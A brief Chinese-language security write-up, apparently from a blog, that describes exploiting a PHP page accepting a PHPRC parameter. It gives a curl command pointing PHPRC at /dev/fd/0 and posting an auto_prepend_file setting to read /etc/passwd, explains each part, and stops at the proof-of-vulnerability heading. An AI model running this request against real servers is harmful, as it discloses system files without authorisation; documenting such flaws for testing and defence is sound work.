未经许可,不得转载。
文章目录
- 正文
正文
前提:通过探测等方式发现某个 PHP 文件存在 PHPRC 参数:
curl "https://xxx.com/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'
PHPRC 用于指定 PHP 配置文件(php.ini)的路径。通过将其设置为 /dev/fd/0,我们尝试让服务器从标准输入读取 PHP 配置。
--data-binary 参数以二进制格式发送数据,适合传递原始数据而非标准表单参数。
auto_prepend_file 是 PHP 配置选项,可以在执行脚本前自动包含指定文件。这里我们设置为 /etc/passwd,试图读取系统敏感信息。
漏洞证明如下:
